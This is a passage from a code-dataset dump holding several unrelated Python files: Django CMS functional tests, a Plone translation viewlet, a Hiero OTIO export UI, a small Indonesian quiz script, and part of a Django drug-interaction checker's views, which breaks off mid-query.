c.get(page.get_url_path())\n self.assertContains(response, 'french title')\n self.assertContains(response, 'lang=\"fr-ch\"')\n\n self.assertNotContains(response, 'english title')\n\n # this should be mapped to the fr-ch content\n c = self.get_admin_client()\n c.cookies[\"django_language\"] = 'fr-fr'\n response = c.get(page.get_url_path())\n self.assertContains(response, 'french title')\n self.assertContains(response, 'lang=\"fr-ch\"')\n\n def test_revision(self):\n \"\"\"Test that a page can edited several times.\"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n page_data = self.get_new_page_data()\n response = c.post('/admin/basic_cms/page/add/', page_data)\n page = Page.objects.all()[0]\n\n page_data['body'] = 'changed body'\n response = c.post('/admin/basic_cms/page/%d/' % page.id, page_data)\n self.assertEqual(Content.objects.get_content(page, 'en-us', 'body'),\n 'changed body')\n\n page_data['body'] = 'changed body 2'\n response = c.post('/admin/basic_cms/page/%d/' % page.id, page_data)\n page.invalidate()\n self.assertEqual(Content.objects.get_content(page, 'en-us', 'body'),\n 'changed body 2')\n\n response = c.get(page.get_url_path())\n self.assertContains(response, 'changed body 2', 1)\n\n self.set_setting(\"PAGE_CONTENT_REVISION\", False)\n\n self.assertEqual(Content.objects.get_content(page, 'en-us', 'body'),\n 'changed body 2')\n\n def test_placeholder(self):\n \"\"\"\n Test that the placeholder is correctly displayed in\n the admin\n \"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n page_data = self.get_new_page_data()\n page_data['template'] = 'pages/examples/nice.html'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n page = Page.objects.all()[0]\n response = c.get('/admin/basic_cms/page/%d/' % page.id)\n self.assertEqual(response.status_code, 200)\n\n self.assertContains(response, 'name=\"right-column\"', 1)\n\n def test_directory_slug(self):\n \"\"\"\n Test diretory slugs\n \"\"\"\n self.set_setting(\"PAGE_UNIQUE_SLUG_REQUIRED\", False)\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n\n page_data = self.get_new_page_data()\n page_data['title'] = 'parent title'\n page_data['slug'] = 'same-slug'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n # the redirect tell that the page has been create correctly\n self.assertRedirects(response, '/admin/basic_cms/page/')\n response = c.get(self.get_page_url('same-slug/'))\n self.assertEqual(response.status_code, 200)\n\n page = Page.objects.all()[0]\n\n response = c.post('/admin/basic_cms/page/add/', page_data)\n # we cannot create 2 root page with the same slug\n # this assert test that the creation fails as wanted\n self.assertEqual(response.status_code, 200)\n\n page1 = Content.objects.get_content_slug_by_slug(page_data['slug']).page\n self.assertEqual(page1.id, page.id)\n\n page_data['title'] = 'children title'\n page_data['target'] = page1.id\n page_data['position'] = 'first-child'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n # finaly test that we can get every page according the path\n response = c.get(self.get_page_url('same-slug'))\n self.assertContains(response, \"parent title\", 3)\n\n response = c.get(self.get_page_url('same-slug/same-slug'))\n self.assertContains(response, \"children title\", 3)\n\n def test_page_admin_view(self):\n \"\"\"Test page admin view\"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n page_data = self.get_new_page_data()\n page_data['slug'] = 'page-1'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n page = Content.objects.get_content_slug_by_slug('page-1').page\n self.assertEqual(page.status, 1)\n response = c.post('/admin/basic_cms/page/%d/change-status/' %\n page.id, {'status': Page.DRAFT})\n page = Content.objects.get_content_slug_by_slug('page-1').page\n self.assertEqual(page.status, Page.DRAFT)\n\n url = '/admin/basic_cms/page/%d/modify-content/title/en-us/' % page.id\n response = c.post(url, {'content': 'test content'})\n self.assertEqual(page.title(), 'test content')\n\n # TODO: realy test these methods\n url = '/admin/basic_cms/page/%d/traduction/en-us/' % page.id\n response = c.get(url)\n self.assertEqual(response.status_code, 200)\n\n url = '/admin/basic_cms/page/%d/sub-menu/' % page.id\n response = c.get(url)\n self.assertEqual(response.status_code, 200)\n\n url = '/admin/basic_cms/page/%d/get-content/%d/' % (page.id,\n Content.objects.get_content_slug_by_slug('page-1').id)\n\n response = c.get(url)\n self.assertEqual(response.status_code, 200)\n\n url = '/admin/basic_cms/page/%d/delete-content/en-us/' % page.id\n response = c.get(url)\n self.assertEqual(response.status_code, 302)\n\n def test_page_alias(self):\n \"\"\"Test page aliasing system\"\"\"\n\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n\n # create some pages\n page_data = self.get_new_page_data()\n page_data['title'] = 'home-page-title'\n page_data['slug'] = 'home-page'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n page_data['title'] = 'downloads-page-title'\n page_data['slug'] = 'downloads-page'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n # create aliases for the pages\n page = Page.objects.from_path('home-page', None)\n self.assertTrue(page)\n p = PageAlias(page=page, url='/index.php')\n p.save()\n\n page = Page.objects.from_path('downloads-page', None)\n self.assertTrue(page)\n p = PageAlias(page=page, url='index.php?page=downloads')\n p.save()\n\n # now check whether we can retrieve the pages.\n # is the homepage available from is alias\n response = c.get(self.get_page_url('index.php'))\n self.assertRedirects(response, self.get_page_url('home-page'), 301)\n\n # for the download page, the slug is canonical\n response = c.get(self.get_page_url('downloads-page/'))\n self.assertContains(response, \"downloads-page-title\", 3)\n\n # calling via its alias must cause redirect\n response = c.get(self.get_page_url('index.php') + '?page=downloads')\n self.assertRedirects(response,\n self.get_page_url('downloads-page'), 301)\n\n def test_page_redirect_to(self):\n \"\"\"Test page redirected to an other page.\"\"\"\n\n client = self.get_admin_client()\n\n # create some pages\n page1 = self.create_new_page(client)\n page2 = self.create_new_page(client)\n\n page1.redirect_to = page2\n page1.save()\n\n # now check whether you go to the target page.\n response = client.get(page1.get_url_path())\n self.assertRedirects(response, page2.get_url_path(), 301)\n\n def test_page_valid_targets(self):\n \"\"\"Test page valid_targets method\"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n page_data = self.get_new_page_data()\n page_data['slug'] = 'root'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n root_page = Content.objects.get_content_slug_by_slug('root').page\n page_data['position'] = 'first-child'\n page_data['target'] = root_page.id\n page_data['slug'] = 'child-1'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertEqual(response.status_code, 302)\n c1 = Content.objects.get_content_slug_by_slug('child-1').page\n\n root_page = Content.objects.get_content_slug_by_slug('root').page\n self.assertEqual(len(root_page.valid_targets()), 0)\n self.assertEqual(str(c1.valid_targets()),\n \"[]\")\n\n def test_ajax_language(self):\n \"\"\"Test that language is working properly\"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n # Activate a language other than settings.LANGUAGE_CODE\n response = c.post('/i18n/setlang/', {'language': 'fr-ch'})\n try:\n from django.utils.translation import LANGUAGE_SESSION_KEY\n except ImportError:\n LANGUAGE_SESSION_KEY = 'django_language'\n self.assertEqual(c.session.get(LANGUAGE_SESSION_KEY, False), 'fr-ch')\n\n # Make sure we're in french\n response = c.get('/admin/basic_cms/page/')\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'Ajouter')\n\n # Create some pages (taken from test_tree_admin_interface)\n page_data = self.get_new_page_data()\n page_data['slug'] = 'root'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n\n root_page = Content.objects.get_content_slug_by_slug('root').page\n page_data['position'] = 'first-child'\n page_data['target'] = root_page.id\n page_data['slug'] = 'child-1'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n\n child_1 = Content.objects.get_content_slug_by_slug('child-1').page\n\n page_data['slug'] = 'child-2'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n\n Content.objects.get_content_slug_by_slug('child-2').page\n\n self.assertEqual(str(Page.objects.all()),\n \"[, , ]\")\n\n \"\"\"\n The relevant bit, fixed by rev 501: the response issued by a move\n command returns content localized in settings.LANGUAGE_CODE (i.e. 'en´)\n even though the original AJAX request passed in a the correct\n session ID localizing this client as fr-ch\n\n This is probably because the LocaleMiddleware gets instantiated\n with a couple request_mocks which have no real connection to the\n AJAX request *but* django.utils.translation caches the active\n language on a per thread basis.\n\n This means that the first \"bogus\" call to\n LocaleMiddleware.process_request will \"kill\" the localization\n data for the AJAX request.\n\n Rev. 501 fixes this by passing in the language code from the original\n request.\n \"\"\"\n response = c.post('/admin/basic_cms/page/%d/move-page/' % child_1.id,\n {'position': 'first-child', 'target': root_page.id})\n\n # Make sure the content response we got was in french\n self.assertContains(response, 'Auteur')\n\n def test_view_context(self):\n \"\"\"\n Test that the default view can only return the context\n \"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n page_data = self.get_new_page_data()\n page_data['slug'] = 'page1'\n # create a page for the example otherwise you will get a Http404 error\n c.post('/admin/basic_cms/page/add/', page_data)\n page1 = Content.objects.get_content_slug_by_slug('page1').page\n\n from basic_cms.views import details\n from basic_cms.http import get_request_mock\n request = get_request_mock()\n context = details(request, path='/page1/', only_context=True)\n self.assertEqual(context['current_page'], page1)\n\n def test_request_mockup(self):\n from basic_cms.http import get_request_mock\n request = get_request_mock()\n self.assertEqual(hasattr(request, 'session'), True)\n\n def test_tree_admin_interface(self):\n \"\"\"\n Test that moving/creating page in the tree is working properly\n using the admin interface\n \"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n page_data = self.get_new_page_data()\n page_data['slug'] = 'root'\n\n response = c.post('/admin/basic_cms/page/add/', page_data)\n\n root_page = Content.objects.get_content_slug_by_slug('root').page\n self.assertTrue(root_page.is_first_root())\n page_data['position'] = 'first-child'\n page_data['target'] = root_page.id\n page_data['slug'] = 'child-1'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n\n child_1 = Content.objects.get_content_slug_by_slug('child-1').page\n self.assertFalse(child_1.is_first_root())\n\n page_data['slug'] = 'child-2'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n\n child_2 = Content.objects.get_content_slug_by_slug('child-2').page\n\n self.assertEqual(str(Page.objects.all()),\n \"[, , ]\")\n # move page 1 in the first position\n response = c.post('/admin/basic_cms/page/%d/move-page/' % child_1.id,\n {'position': 'first-child', 'target': root_page.id})\n\n self.assertEqual(str(Page.objects.all()),\n \"[, , ]\")\n\n # move page 2 in the first position\n response = c.post('/admin/basic_cms/page/%d/move-page/' % child_2.id,\n {'position': 'left', 'target': child_1.id})\n\n self.assertEqual(str(Page.objects.all()),\n \"[, , ]\")\n\n # try to create a sibling with the same slug, via left, right\n from basic_cms import settings as pages_settings\n setattr(pages_settings, \"PAGE_UNIQUE_SLUG_REQUIRED\", False)\n page_data['target'] = child_2.id\n page_data['position'] = 'left'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertEqual(response.status_code, 200)\n\n # try to create a sibling with the same slug, via first-child\n page_data['target'] = root_page.id\n page_data['position'] = 'first-child'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertEqual(response.status_code, 200)\n # try to create a second page 2 in root\n del page_data['target']\n del page_data['position']\n\n setattr(pages_settings, \"PAGE_UNIQUE_SLUG_REQUIRED\", True)\n # cannot create because slug exists\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertEqual(response.status_code, 200)\n # Now it should work beause the page is not a sibling\n setattr(pages_settings, \"PAGE_UNIQUE_SLUG_REQUIRED\", False)\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertEqual(response.status_code, 302)\n self.assertEqual(Page.objects.count(), 4)\n # Should not work because we already have sibling at the same level\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertEqual(response.status_code, 200)\n\n # try to change the page 2 slug into page 1\n page_data['slug'] = 'child-1'\n response = c.post('/admin/basic_cms/page/%d/' % child_2.id, page_data)\n self.assertEqual(response.status_code, 200)\n setattr(pages_settings, \"PAGE_UNIQUE_SLUG_REQUIRED\", True)\n response = c.post('/admin/basic_cms/page/%d/' % child_2.id, page_data)\n self.assertEqual(response.status_code, 200)\n\n def test_tree(self):\n \"\"\"\n Test that the navigation tree works properly with mptt.\n \"\"\"\n c = self.get_admin_client()\n c.login(username='batiste', password='b')\n page_data = self.get_new_page_data()\n page_data['slug'] = 'page1'\n c.post('/admin/basic_cms/page/add/', page_data)\n page_data['slug'] = 'page2'\n c.post('/admin/basic_cms/page/add/', page_data)\n page_data['slug'] = 'page3'\n c.post('/admin/basic_cms/page/add/', page_data)\n self.assertEqual(str(Page.objects.navigation()),\n \"[, , ]\")\n\n p1 = Content.objects.get_content_slug_by_slug('page1').page\n p2 = Content.objects.get_content_slug_by_slug('page2').page\n p3 = Content.objects.get_content_slug_by_slug('page3').page\n\n p2.move_to(p1, 'left')\n p2.save()\n\n self.assertEqual(str(Page.objects.navigation()),\n \"[, , ]\")\n\n p3.move_to(p2, 'left')\n p3.save()\n\n self.assertEqual(str(Page.objects.navigation()),\n \"[, , ]\")\n\n p1 = Content.objects.get_content_slug_by_slug('page1').page\n p2 = Content.objects.get_content_slug_by_slug('page2').page\n p3 = Content.objects.get_content_slug_by_slug('page3').page\n\n p3.move_to(p1, 'first-child')\n p2.move_to(p1, 'first-child')\n\n self.assertEqual(str(Page.objects.navigation()),\n \"[]\")\n\n p3 = Content.objects.get_content_slug_by_slug('page3').page\n p3.move_to(p1, 'left')\n\n self.assertEqual(str(Page.objects.navigation()),\n \"[, ]\")\n\n def test_page_redirect_to_url(self):\n \"\"\"Test page redirected to external url.\"\"\"\n\n client = self.get_admin_client()\n\n page1 = self.create_new_page(client)\n url = 'http://code.google.com/p/django-page-cms/'\n page1.redirect_to_url = url\n page1.save()\n\n # now check whether we can retrieve the page.\n response = client.get(page1.get_url_path())\n self.assertTrue(response.status_code == 301)\n self.assertTrue(response['Location'] == url)\n\n def test_page_freeze_date(self):\n \"\"\"Test page freezing feature.\"\"\"\n c = self.get_admin_client()\n page_data = self.get_new_page_data()\n page_data['title'] = 'before'\n page_data['slug'] = 'before'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n page = Page.objects.from_path('before', None)\n self.assertEqual(page.freeze_date, None)\n limit = datetime.datetime.now()\n page.freeze_date = limit\n page.save()\n\n page_data['title'] = 'after'\n page_data['slug'] = 'after'\n # this post erase the limit\n response = c.post('/admin/basic_cms/page/%d/' % page.id, page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n page = Page.objects.from_path('after', None)\n page.freeze_date = limit\n self.assertEqual(page.slug(), 'before')\n page.freeze_date = None\n page.save()\n self.assertEqual(page.slug(), 'after')\n page.freeze_date = limit\n page.save()\n self.assertEqual(page.slug(), 'before')\n\n def test_delegate_to(self):\n \"\"\"Test the view delegate feature.\"\"\"\n c = self.get_admin_client()\n page_data = self.get_new_page_data()\n page_data['title'] = 'delegate'\n page_data['slug'] = 'delegate'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n page = Page.objects.from_path('delegate', None)\n\n from basic_cms import urlconf_registry as reg\n reg.register_urlconf('test', 'basic_cms.testproj.documents.urls',\n label='test')\n page.delegate_to = 'test'\n page.save()\n\n response = c.get(self.get_page_url('delegate'))\n self.assertEqual(response.status_code, 200)\n\n from basic_cms.testproj.documents.models import Document\n doc = Document(title='doc title 1', text='text', page=page)\n doc.save()\n\n response = c.get(self.get_page_url('delegate/doc-%d' % doc.id))\n self.assertEqual(response.status_code, 200)\n\n self.assertContains(response, \"doc title 1\")\n reg.registry = []\n\n def test_untranslated(self):\n \"\"\"Test the untranslated feature in the admin.\"\"\"\n c = self.get_admin_client()\n page_data = self.get_new_page_data()\n page_data['title'] = 'untranslated'\n page_data['slug'] = 'untranslated'\n unstranslated_string = 'the untranslated string'\n page_data['untrans'] = unstranslated_string\n page_data['template'] = 'pages/tests/untranslated.html'\n response = c.post('/admin/basic_cms/page/add/', page_data)\n self.assertRedirects(response, '/admin/basic_cms/page/')\n\n page = Page.objects.from_path('untranslated', None)\n self.assertEqual(\n Content.objects.get_content(page, 'en-us', 'untrans'),\n unstranslated_string\n )\n\n page_data['untrans'] = ''\n response = c.get('/admin/basic_cms/page/%d/?language=fr-ch' % page.id)\n self.assertContains(response, unstranslated_string)\n\n def test_root_page(self):\n \"\"\"Test that the root page doesn't trigger a 404.\"\"\"\n c = self.get_admin_client()\n self.new_page(content={'slug': 'this-is-not-a-404'})\n self.assertEqual(Page.objects.count(), 1)\n page = Page.objects.on_site()[0]\n self.assertTrue(page.is_first_root())\n\n response = c.get(self.get_page_url())\n self.assertEqual(response.status_code, 200)\n\n def test_page_with_trailing_slash(self):\n \"\"\"\n Test that a page is also available with and without a trailing slash.\n \"\"\"\n c = self.get_admin_client()\n self.new_page(content={'slug': 'root'})\n self.new_page(content={'slug': 'other'})\n response = c.get(self.get_page_url('other'))\n self.assertEqual(response.status_code, 200)\n response = c.get(self.get_page_url('other/'))\n self.assertEqual(response.status_code, 200)\n\n def test_page_sitemap(self):\n \"\"\"\n Test the sitemap class\n \"\"\"\n c = self.get_admin_client()\n page1 = self.new_page(content={'slug': 'english-slug'})\n page1.save()\n Content(page=page1, language='fr-ch', type='slug',\n body='french-slug').save()\n\n response = c.get('/sitemap.xml')\n\n self.assertContains(response, 'english-slug')\n self.assertNotContains(response, 'french-slug')\n\n response = c.get('/sitemap2.xml')\n\n self.assertContains(response, 'english-slug')\n self.assertContains(response, 'french-slug')\n","repo_name":"ArabellaTech/django-basic-cms","sub_path":"basic_cms/tests/test_functionnal.py","file_name":"test_functionnal.py","file_ext":"py","file_size_in_byte":32694,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"91"}
+{"seq_id":"40832712114","text":"from Acquisition import aq_inner\nfrom AccessControl.SecurityManagement import getSecurityManager\n\nfrom plone.app.layout.viewlets import ViewletBase\n\nclass MultilingualContentViewlet(ViewletBase):\n\n def update(self):\n # We have to check the view permission on the translated object, because\n # getTranslations returns all objects, no matter the workflow state\n context = aq_inner(self.context)\n _checkPermission = getSecurityManager().checkPermission\n self.translations = []\n for lang, content in context.getTranslations(review_state=False).items():\n if _checkPermission('View', content):\n self.translations.append(content)\n","repo_name":"plone/Products.LinguaPlone","sub_path":"Products/LinguaPlone/browser/contentlinkviewlet.py","file_name":"contentlinkviewlet.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"91"}
+{"seq_id":"27389445346","text":"# -*- coding: utf-8 -*-\n\n__author__ = \"Daniel Flehner Heen\"\n__credits__ = [\"Jakub Jezek\", \"Daniel Flehner Heen\"]\n\nimport hiero.ui\nfrom .OTIOExportTask import (\n OTIOExportTask,\n OTIOExportPreset\n)\n\ntry:\n # Hiero >= 11.x\n from PySide2 import QtCore\n from PySide2.QtWidgets import QCheckBox\n from hiero.ui.FnTaskUIFormLayout import TaskUIFormLayout as FormLayout\n\nexcept ImportError:\n # Hiero <= 10.x\n from PySide import QtCore # lint:ok\n from PySide.QtGui import QCheckBox, QFormLayout # lint:ok\n\n FormLayout = QFormLayout # lint:ok\n\nfrom openpype.hosts.hiero.api.otio import hiero_export\n\nclass OTIOExportUI(hiero.ui.TaskUIBase):\n def __init__(self, preset):\n \"\"\"Initialize\"\"\"\n hiero.ui.TaskUIBase.__init__(\n self,\n OTIOExportTask,\n preset,\n \"OTIO Exporter\"\n )\n\n def includeMarkersCheckboxChanged(self, state):\n # Slot to handle change of checkbox state\n hiero_export.include_tags = state == QtCore.Qt.Checked\n\n def populateUI(self, widget, exportTemplate):\n layout = widget.layout()\n formLayout = FormLayout()\n\n # Hiero ~= 10.0v4\n if layout is None:\n layout = formLayout\n widget.setLayout(layout)\n\n else:\n layout.addLayout(formLayout)\n\n # Checkboxes for whether the OTIO should contain markers or not\n self.includeMarkersCheckbox = QCheckBox()\n self.includeMarkersCheckbox.setToolTip(\n \"Enable to include Tags as markers in the exported OTIO file.\"\n )\n self.includeMarkersCheckbox.setCheckState(QtCore.Qt.Unchecked)\n\n if self._preset.properties()[\"includeTags\"]:\n self.includeMarkersCheckbox.setCheckState(QtCore.Qt.Checked)\n\n self.includeMarkersCheckbox.stateChanged.connect(\n self.includeMarkersCheckboxChanged\n )\n\n # Add Checkbox to layout\n formLayout.addRow(\"Include Tags:\", self.includeMarkersCheckbox)\n\n\nhiero.ui.taskUIRegistry.registerTaskUI(\n OTIOExportPreset,\n OTIOExportUI\n)\n","repo_name":"ynput/OpenPype","sub_path":"openpype/hosts/hiero/api/startup/Python/Startup/otioexporter/OTIOExportUI.py","file_name":"OTIOExportUI.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":263,"dataset":"github-code","pt":"91"}
+{"seq_id":"7117828613","text":"import random\n\nmatematika = [(\"mtk soal 1\",\"mtk jwbn1\"),\n (\"mtk soal 2\",\"mtk jwbn2\"),\n (\"mtk soal 3\",\"mtk jwbn3\"),\n (\"mtk soal 4\",\"mtk jwbn4\"),\n (\"mtk soal 5\",\"mtk jwbn5\"),\n ]\nfisika = [(\"fsk soal 1\",\"fsk jwbn1\"),\n (\"fsk soal 2\",\"fsk jwbn2\"),\n (\"fsk soal 3\",\"fsk jwbn3\"),\n (\"fsk soal 4\",\"fsk jwbn4\"),\n (\"fsk soal 5\",\"fsk jwbn5\"),\n ]\nkimia = [(\"kma soal 1\",\"kma jwbn1\"),\n (\"kma soal 2\",\"kma jwbn2\"),\n (\"kma soal 3\",\"kma jwbn3\"),\n (\"kma soal 4\",\"kma jwbn4\"),\n (\"kma soal 5\",\"kma jwbn5\"),\n ]\nbiologi = [(\"blg soal 1\",\"blg jwbn1\"),\n (\"blg soal 2\",\"blg jwbn2\"),\n (\"blg soal 3\",\"blg jwbn3\"),\n (\"blg soal 4\",\"blg jwbn4\"),\n (\"blg soal 5\",\"blg jwbn5\"),\n ]\n\n\ndef main():\n while True :\n print(\"\\nPilih Mapel:\")\n print(\"1. Matematika\")\n print(\"2. Fisika\")\n print(\"3. Kimia\")\n print(\"4. Biologi\")\n print(\"5. Udahan\")\n choice = input(\"Pilih MaPel: \")\n\n if choice == '1':\n soal_mtk, answer = random.choice(matematika)\n print(\"Jawablah soal ini: \")\n print(soal_mtk)\n answer_user = input(\"Jawaban: \")\n\n if answer_user.lower() == answer.lower():\n print(\"Jawaban anda benar\")\n else :\n print(\"Jawaban anda salah\")\n continue\n \n lanjut = input(\"CODE OTP: \")\n if lanjut.lower() == 'otp':\n break\n\n elif choice == '2':\n soal_fsk, answer = random.choice(fisika)\n print(\"Jawablah soal ini: \")\n print(soal_fsk)\n answer_user = input(\"Jawaban: \")\n \n if answer_user.lower() == answer.lower():\n print(\"Jawaban anda benar\")\n else:\n print(\"Jawaban anda salah\")\n continue\n\n elif choice == '3':\n soal_kma, answer = random.choice(kimia)\n print(\"Jawablah soal ini: \")\n print(soal_kma)\n answer_user = input(\"Jawaban: \")\n \n if answer_user.lower() == answer.lower():\n print(\"Jawaban anda benar\")\n else:\n print(\"Jawaban anda salah\")\n continue\n\n elif choice == '4':\n soal_blg, answer = random.choice(biologi)\n print(\"Jawablah soal ini: \")\n print(soal_blg)\n answer_user = input(\"Jawaban: \")\n\n if answer_user.lower() == answer.lower():\n print(\"Jawaban anda benar\")\n else:\n print(\"Jawaban anda salah\")\n continue\n\n elif choice == '5':\n print(\"Jangan lupa banyak berlatih ya...\")\n break\n\n else:\n print(\"salah pilihan\")\n\nif \"_main_\":\n main()","repo_name":"RapliiMZ/Project-Python","sub_path":"src/soal.py","file_name":"soal.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"34680905462","text":"from django.shortcuts import render, redirect\nfrom django.db import connection\nfrom django.contrib import messages\nfrom django import forms\nfrom django.contrib.auth.hashers import make_password, check_password\n\n## Functions used in the rest of the views\n\n# This function takes a drug in parameter and checks if this drug exists in the database,\n# it returns True or False, if True is returned, it means that the drug exists, if False is\n# returned, the drug doesn't exist. \ndef CheckExistingDrug(drug):\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT count(*) FROM drug WHERE name=%s\",([drug]))\n\tr=cur.fetchall()\n\tnb=0\n\tfor row in r:\n\t\tnb=row[0]\n\tif nb==0:\n\t\treturn False\n\telse:\n\t\treturn True\n\n# This function takes a substance in parameter and checks if this substance exists in the database,\n# it returns True or False, if True is returned, it means that the substance exists, if False is\n# returned, the substance doesn't exist. \ndef CheckExistingSubstance(substance):\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT count(*) FROM substance WHERE name=%s\",([substance]))\n\tr=cur.fetchall()\n\tnb=0\n\tfor row in r:\n\t\tnb=row[0]\n\tif nb==0:\n\t\treturn False\n\telse:\n\t\treturn True\n\n# Same with accession number\ndef CheckExistingAccNum(acc_nb):\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT count(*) FROM substance WHERE accession_num=%s\",([acc_nb]))\n\tr=cur.fetchall()\n\tnb=0\n\tfor row in r:\n\t\tnb=row[0]\n\tif nb==0:\n\t\treturn False\n\telse:\n\t\treturn True\n\n# Same with food interaction\ndef CheckExistingFoodInteraction(substance, food):\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT count(*) FROM food_interactions WHERE subst_name=%s and food=%s\",([substance],[food]))\n\tr=cur.fetchall()\n\tnb=0\n\tfor row in r:\n\t\tnb=row[0]\n\tif nb==0:\n\t\treturn False\n\telse:\n\t\treturn True\n\n# Checks if the username and password that are in the parameters correspond to an existing administrator\n# it returns True if the username exists and the password corresponds, but returns false if the\n# username doesn't exist or if the password doesn't correspond\ndef CheckAdmin(username, password):\n\tcur=connection.cursor()\n\tusr=username.split()\n\tpwd=password.split()\n\tcur.execute(\"SELECT * FROM administrator WHERE name=%s\",(usr))\n\tr=cur.fetchall()\n\tif not r:\n\t\treturn False\n\telse:\n\t\tif check_password(pwd[0],r[0][1])==True:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\ndef home(request):\n\t# Start by creating a list of all the drugs that there are in the database for the dropdown list\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT name FROM drug\")\n\tr=cur.fetchall()\n\t# We fetch the first item of each row (the name of the drug)\n\tndrugs=[row[0] for row in r]\n\tlistD=[]\n\tlistDbis=[]\n\tlistS=[]\n\tlistI=[]\n\t# For each form input (drug 1 to drug 5) we fetch what is in it and put it in listD\n\tfor i in range(6):\n\t\tif request.POST.get(f'drug{i}')!=None:\n\t\t\tlistD.append(request.POST.get(f'drug{i}'))\n\t# For each drug in list D we select the corresponding substance and add it in listS and we also populate the listDbis\n\t# so that we have the drug (here 'i') and its substance (here row[0)\n\tfor i in listD:\n\t\tcur.execute(\"SELECT subst_name FROM drug WHERE name=%s\",([i]))\n\t\tr=cur.fetchall()\n\t\tfor row in r:\n\t\t\tlistS.append(row[0])\n\t\t\tlistDbis.append([i,row[0]])\n\t# We start by selecting each interaction in the database and then for each line of the SQL query, we check if the\n\t# substances we have in our listS are present in the interaction list. In other words if one of our substances is\n\t# in position 1 or 2 of a row and that another substance of our list is in the corresponding other position, we have\n\t# an interaction\n\t# We add only the interactions that came out in the list called listI\n\tcur.execute(\"SELECT * FROM interactions ORDER BY level DESC\")\n\tr=cur.fetchall()\n\tfor row in r:\n\t\tli=list(row[0:])\n\t\tif li[1] in listS and li[2] in listS:\n\t\t\t# Each row of this list contains 'subst_a', 'subst_b', 'description' and 'level'\n\t\t\tlistI.append(li)\n\tcontext={\"nd\":ndrugs, 'listI':listI, 'listDbis':listDbis}\n\t\n\t#Insert the statistics into the statistics table\n\tfor i in range(len(listDbis)):\n\t\tinpage=\"\"\n\t\tinpgender=\"\"\n\t\tinpcontinent=\"\"\n\t\tinpdrug=\"\"\n\t\tsubst=\"\"\n\t\tif request.POST.get(\"age\")!=None and request.POST.get(\"gender\")!=None and request.POST.get(\"continent\")!=None:\n\t\t\tinpdrug=listD[i]\n\t\t\tsubst=listS[i]\n\t\t\tinpage=request.POST.get(\"age\")\n\t\t\tinpgender=request.POST.get(\"gender\")\n\t\t\tinpcontinent=request.POST.get(\"continent\")\n\t\t\tcur.execute('INSERT INTO statistics(id, drug, substance, age, gender, continent) VALUES(DEFAULT, %s, %s, %s, %s, %s)', ([inpdrug], [subst], [inpage], [inpgender], [inpcontinent]))\n\t\n\treturn render(request, 'DrugiComp/home.html', context)\n\ndef about(request):\n\treturn render(request, 'DrugiComp/about.html', {'title':'About'})\n\ndef statistics(request):\n\t# Data for chart 1\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT drug, COUNT(*) FROM statistics GROUP BY drug ORDER BY COUNT(*) DESC\")\n\tdrugs=cur.fetchall()\n\tdrugnames=[]\n\tdrugcount=[]\n\tfor i in drugs:\n\t\tdrugnames.append(i[0])\n\t\tdrugcount.append(i[1])\n\n\t# Data for chart 2\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT substance, COUNT(*) FROM statistics GROUP BY substance ORDER BY COUNT(*) DESC\")\n\tsubstances=cur.fetchall()\n\tsubstnames=[]\n\tsubstcount=[]\n\tfor i in substances:\n\t\tsubstnames.append(i[0])\n\t\tsubstcount.append(i[1])\n\n\t# Data for chart 3\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT continent, COUNT(*) FROM statistics WHERE NOT continent='' GROUP BY continent ORDER BY COUNT(*) DESC\")\n\tcontinents=cur.fetchall()\n\tcontnames=[]\n\tcontcount=[]\n\tfor i in continents:\n\t\tcontnames.append(i[0])\n\t\tcontcount.append(i[1])\n\n\t# Data for chart 4\n\tcur=connection.cursor()\n\tcur.execute(\"SELECT age, COUNT(*) FROM statistics WHERE gender='Male' AND age!='' 